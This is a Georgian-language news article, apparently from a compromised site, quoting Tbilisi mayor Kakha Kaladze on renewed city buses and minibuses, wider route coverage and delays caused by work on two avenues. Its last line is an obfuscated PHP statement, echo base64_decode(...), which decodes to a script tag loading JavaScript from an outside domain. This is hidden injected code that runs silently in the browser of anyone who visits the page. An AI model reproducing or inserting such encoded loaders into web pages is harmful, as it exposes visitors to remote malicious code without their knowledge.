celsiusi
ავერსი საქკაბელი
თბილისის მერის, კახა კალაძის განცხადებით, დედაქალაქს დღეს ყველაზე ახალი და მოწესრიგებული საზოგადოებრივი ტრანსპორტი ჰყავს.
 
მისი თქმით, „საზოგადოებას კარგად ახსოვს წლების წინ, როგორი ავტობუსებით გადაადგილდებოდა და დღეს, იმ თვალსაზრისითაა გამოწვევები, რომ ძალიან ბევრი ადამიანი საზოგადოებრივი ტრანსპორტით სარგებლობს.“
 
„თბილისს ემსახურება ყველაზე ახალი და მოწესრიგებული ავტობუსი და მიკროავტობუსი. ამის გაკეთება მნიშვნელოვანი იყო, ჩვენ ჩვენს გადაწყვეტილებებში, ჩვენს განსახორციელებელ გეგმებში და პროექტებში აბსოლუტურად თანმიმდევრულები ვართ. მე ძალიან ბევრჯერ მითქვამს და კიდეც ერთხელ გავიმეორებ, შეიძლება ეს ბევრს არ მოსწონს, მაგრამ ეს არის რეალობა, დედაქალაქს დღეს ყველაზე ახალი და მოწესრიგებული საზოგადოებრივი ტრანსპორტი ჰყავს. თუ რას ნიშნავს მოწესრიგებული ტრანსპორტი, ვფიქრობ, ამის ახსნა-განმარტება საჭირო არ არის იმიტომ, რომ საზოგადოებას კარგად ახსოვს წლების წინ, როგორი ავტობუსებით გადაადგილდებოდა. დღეს, იმ თვალსაზრისით გვაქვს გამოწვევები, რომ ძალიან ბევრი ადამიანი საზოგადოებრივი ტრანსპორტით გადაადგილდება. დღეს, ყველაზე მთავარი და მნიშვნელოვანი არის ის, რომ ჩვენი ახალი და მოწესრიგებული საზოგადოებრივი ტრანსპორტი, ავტობუსი და მიკროავტობუსი ყველასათვის ხელმისაწვდომი და კომფორტული იყოს, რომ ადამიანს უპრობლემოდ შეეძლოს გადაადგილება ერთი კონკრეტული ადგილიდან, მეორე ადგილზე,“ -განაცხადა კალაძემ.
 
ასევე, თბილისის მთავრობის სხდომაზე მერმა განმარტა, რომ დედაქალაქში არსებობდა კონკრეტული ადგილები, სადაც საზოგადოებრივი ტრანსპორტი არ გადაადგილდებოდა, მაგრამ ეს პრობლემა უკვე გადაჭრილია.
 
„ჩვენ უდიდესი პრობლემები გვქონდა, იმიტომ, რომ კონკრეტული უბნები, ქუჩები, რაიონები იყო, სადაც საზოგადოებრივი ტრანსპორტი არ გადაადგილდებოდა. დაფარვის თვალსაზრისით, ამ მხრივაც გვაქვს წინ გადადგმული ნაბიჯები და ისეთ უბნებში, ქუჩებზე, რაიონებში, სადაც ავტობუსი და მიკროავტობუსი არ დადიოდა. დღეს, უკვე იქ მცხოვრებ ადამიანებს ემსახურება. რეფორმა გრძელდება განხორციელების პროცესი მიმდინარეობს და ცხადია, არსებობს გამოწვევები, პრობლემები. ჩვენ ამას ადეკვატურად ვუყურებთ, ვიცით, რა არის გასაკეთებელი, ვიცით, რა არის შემდეგი გადასადგმელი ნაბიჯები. იმისთვის, რომ საზოგადოებრივი ტრანსპორტი დედაქალაქში ყველასთვის ხელმისაწვდომი, ყველაზე სწრაფი და ყველაზე კომფორტული იყოს. რა თქმა უნდა, ამას სჭირდება შესაბამისი ინფრასტრუქტურა. მხედველობაში მაქვს, ქუჩების მოწესრიგება, კეთილმოწყობა, განახლება, საავტობუსო ზოლების მოწყობა იმისთვის, რომ შეუფერხებლად შეძლოს გადაადგილება ავტობუსმა და მიკროავტობუსმა. ზუსტად ამიტომ არის, რომ ჩვენ ასეთ მნიშვნელოვან პროექტებს ვახორციელებთ დედაქალაქში,“ - აღნიშნა მერმა.
 
მისივე განმარტებით, ქალაქში არსებული შეფერხებების მიზეზი ორ დიდ გამზირზე მიმდინარე სარეაბილიტაციო სამუშაოებია.
 
„დღეს ორი დიდი გამზირის რეაბილიტაცია მიმდინარეობს, რომელიც გარკვეულ შეფერხებებს იწვევს. ცხადია, ეს შეფერხებები იწვევს ადამიანების გულისწყრომას. მე მესმის თითოეული თქვენგანის, როდესაც ავტობუსი ან მიკროავტობუსი დაგვიანებით მოდის კონკრეტულ გაჩერებაზე, სადაც ბევრი ადამიანის თავმოყრა ხდება, იმის გამო, რომ ავტობუსი საცობში დგას და ვერ ახერხებს კონკრეტულ გაჩერებაზე დროულად მივიდეს. ამ ყველაფერს ჩვენ აუცილებლად მოვაწესრიგებთ და ეს პრობლემა მოგვარდება. სამუშაოები ძალიან მალე უნდა დასრულდეს“,-განაცხადა კალაძემ.
476
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");